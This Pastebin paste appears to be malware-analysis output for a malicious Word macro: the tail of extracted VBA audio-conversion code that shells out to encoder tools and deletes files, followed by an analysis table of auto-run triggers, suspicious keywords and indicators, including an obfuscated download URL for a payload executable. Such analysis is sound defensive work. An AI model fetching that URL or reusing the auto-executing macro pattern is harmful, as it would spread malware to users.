  542.                         frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  543.                    End If
  544.                    
  545.                     ' hier startet normalisierung
  546.                    cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  547.                    Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  548.                End If
  549.                
  550.                 'R?ckkonvertierung
  551.                If Aktivierauswahl.mp2_cbr_aktiv.Value = "1" Then
  552.                     frmMain.encoderset.Caption = "CBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
  553.                    cmd = """" + App.Path + "\tools\toolame.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2cbrparameter
  554.                     Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  555.                Else
  556.                     frmMain.encoderset.Caption = "VBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
  557.                    cmd = """" + App.Path + "\tools\toolame.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2vbrparameter
  558.                     Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  559.                End If
  560.             End If
  561.         End If
  562.        
  563.         If extension = "ogg" Then
  564.             ' hier startet lame (mp2 in temp.wav)
  565.            cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  566.            Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  567.                
  568.             If Aktivierauswahl.oggnormal_aktiv.Value = "1" Then
  569.                 frmMain.normset.Caption = " Normalize" 'Infofenster
  570.                    
  571.                 If normal.prozenable.Value = "1" Then
  572.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  573.                Else
  574.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  575.                End If
  576.                    
  577.                 ' hier startet normalisierung
  578.                cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  579.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  580.            End If
  581.                
  582.             'R?ckkonvertierung
  583.            cmd = """" + App.Path + "\tools\oggenc.exe""" + " """ + frmMain.work.Text + "temp.wav"" " + OGGparameter
  584.             Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  585.            Call Werkzeuge.IsFileOpen(frmMain.work.Text + "temp.ogg")
  586.             Name frmMain.work.Text + "temp.ogg" As frmMain.work.Text + filename + ".ogg"
  587.         End If
  588.        
  589.         If extension = "mp3" Then
  590.             If Aktivierauswahl.mp3normal_aktiv.Value = "1" Then 'wenn normalisierung (normalize) aktiviert
  591.                frmMain.normset.Caption = " Normalize" 'Infofenster
  592.                
  593.                 If normal.prozenable.Value = "1" Then
  594.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  595.                Else
  596.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  597.                End If
  598.                
  599.                 ' hier startet lame (mp2 in temp.wav)
  600.                cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  601.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  602.                
  603.                 ' hier startet normalisierung
  604.                cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  605.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  606.                temppfad = """" + frmMain.work.Text + "temp.wav"" """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung aktiviert
  607.            Else
  608.                 temppfad = """" + file + """ """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung (normalize) deaktiviert
  609.            End If
  610.            
  611.             'Hier wird Lame gestartet
  612.            If Aktivierauswahl.mp3_cbr_aktiv.Value = "1" Then 'CBR verwenden
  613.                frmMain.encoderset.Caption = "CBR " + MP3cbrmenu.cbrbitrate.Text 'Infofenster
  614.                cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3cbrparameter    'Dos-Befehl bilden
  615.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  616.            End If
  617.            
  618.             If Aktivierauswahl.mp3_vbr_aktiv.Value = "1" Then 'VBR verwenden
  619.                frmMain.encoderset.Caption = "VBR " + MP3vbrmenu.minbit.Text + "/" + MP3vbrmenu.maxbit.Text 'Infofenster
  620.                cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3vbrparameter  'Dos-Befehl bilden
  621.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  622.            End If
  623.                
  624.             If Aktivierauswahl.mp3_abr_aktiv.Value = "1" Then 'ABR verwenden
  625.                frmMain.encoderset.Caption = "ABR " + MP3abrmenu.abrbitrate.Text 'Infofenster
  626.                cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3abrparameter   'Dos-Befehl bilden
  627.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  628.            End If
  629.            
  630.             'MP3-Gain (mp3 normalisierung)
  631.            If Aktivierauswahl.mp3gain_aktiv.Value = "1" Then
  632.                 frmMain.normset.Caption = " MP3-Gain" 'Infofenster
  633.    
  634.                 If mp3gain.auto.Value = "1" Then
  635.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto" 'Infofenster
  636.                Else
  637.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(mp3gain.Slider1.CurPosition) + "db" 'Infofenster
  638.                End If
  639.                
  640.                 cmd = """" + App.Path + "\tools\mp3gain.exe""" + mp3gainstring + """" + frmMain.work.Text + filename + "." + extension + """" 'Dos-Befehl bilden
  641.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  642.            End If
  643.         End If
  644.        
  645.         frmMain.mp3size.Caption = Format(FileLen(frmMain.work.Text + filename + "." + extension) / 1024, "0.0") + "kb"
  646.         quellfile = frmMain.work.Text + filename + "." + extension 'Tempquellfile wird bestimmt
  647.        If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist) 'wenn alte "normale" playlist dann l?schen
  648.        konvertieren = quellfile
  649.        
  650.         If extension = "mp2" Or extension = "mp3" Then
  651.             Set genie = frmMain.AudioGenie
  652.             genie.ID3v2EncodeSettings = frmMain.encoderset.Caption + frmMain.normset.Caption 'Encodersettings
  653.            genie.SaveID3v2ToFile (konvertieren)
  654.             Set genie = Nothing
  655.         End If
  656.        
  657.         If FileLen(konvertieren) < tagging.delsize(0).CurPosition Then
  658.             If LenB(Dir$(konvertieren, vbDirectory)) <> 0 Then Kill konvertieren
  659.             Call Ausgabe.textbox(filename + ".mp2......Filesize problem / deleted")
  660.             konvertieren = "error"
  661.         End If
  662.        
  663.         Set DShell = Nothing
  664.        
  665.         Exit Function
  666. fehler:
  667.         Call Ausgabe.textbox("Unknown problem / trying next file")
  668.         konvertieren = "error"
  669. End Function
  670. Private Sub untagged(quellfile As String, verzeichnis As String, akttime As Date, aktdate As Date, file As String, anzahl As Integer, upperlimit As Integer)
  671.     Call file_speichern.untaggedspeichern(quellfile, verzeichnis, akttime, aktdate) 'File verschieben
  672.    If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
  673.    frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
  674. End Sub
  675. Private Sub tagged(quellfile As String, temppfad As String, file As String, akttime As Date, aktdate As Date, anzahl As Integer, upperlimit As Integer)
  676.     Call file_speichern.taggedspeichern(quellfile, temppfad, akttime, aktdate) 'File verschieben
  677.    frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
  678.    If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
  679. End Sub
  680.  
  681. +------------+----------------------+-----------------------------------------+
  682. | Type       | Keyword              | Description                             |
  683. +------------+----------------------+-----------------------------------------+
  684. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  685. | Suspicious | Kill                 | May delete a file                       |
  686. | Suspicious | Open                 | May open a file                         |
  687. | Suspicious | MkDir                | May create a directory                  |
  688. | Suspicious | Binary               | May read or write a binary file (if     |
  689. |            |                      | combined with Open)                     |
  690. | Suspicious | CreateObject         | May create an OLE object                |
  691. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  692. |            |                      | strings                                 |
  693. | Suspicious | CopyFile             | May copy a file                         |
  694. | Suspicious | SaveToFile           | May create a text file                  |
  695. | Suspicious | Write                | May write to a file (if combined with   |
  696. |            |                      | Open)                                   |
  697. | Suspicious | Output               | May write to a file (if combined with   |
  698. |            |                      | Open)                                   |
  699. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  700. |            |                      | may be used to obfuscate strings        |
  701. |            |                      | (option --decode to see all)            |
  702. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  703. |            | Strings              | may be used to obfuscate strings        |
  704. |            |                      | (option --decode to see all)            |
  705. | IOC        | Mb5k9G0zH.exe        | Executable file name                    |
  706. | IOC        | besplit.exe          | Executable file name                    |
  707. | IOC        | lame.exe             | Executable file name                    |
  708. | IOC        | normalize.exe        | Executable file name                    |
  709. | IOC        | toolame.exe          | Executable file name                    |
  710. | IOC        | oggenc.exe           | Executable file name                    |
  711. | IOC        | mp3gain.exe          | Executable file name                    |
  712. | IOC        | http://mszpdorog.hu/ | URL (obfuscation: VBA expression)       |
  713. |            | 45g33/34t2d3.exe     |                                         |
  714. | IOC        | 34t2d3.exe           | Executable file name (obfuscation: VBA  |
  715. |            |                      | expression)                             |
  716. | IOC        | besplit.exe          | Executable file name (obfuscation: VBA  |
  717. |            |                      | expression)                             |
  718. | IOC        | lame.exe             | Executable file name (obfuscation: VBA  |
  719. |            |                      | expression)                             |
  720. | IOC        | normalize.exe        | Executable file name (obfuscation: VBA  |
  721. |            |                      | expression)                             |
  722. | IOC        | toolame.exe          | Executable file name (obfuscation: VBA  |
  723. |            |                      | expression)                             |
  724. | IOC        | oggenc.exe           | Executable file name (obfuscation: VBA  |
  725. |            |                      | expression)                             |
  726. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!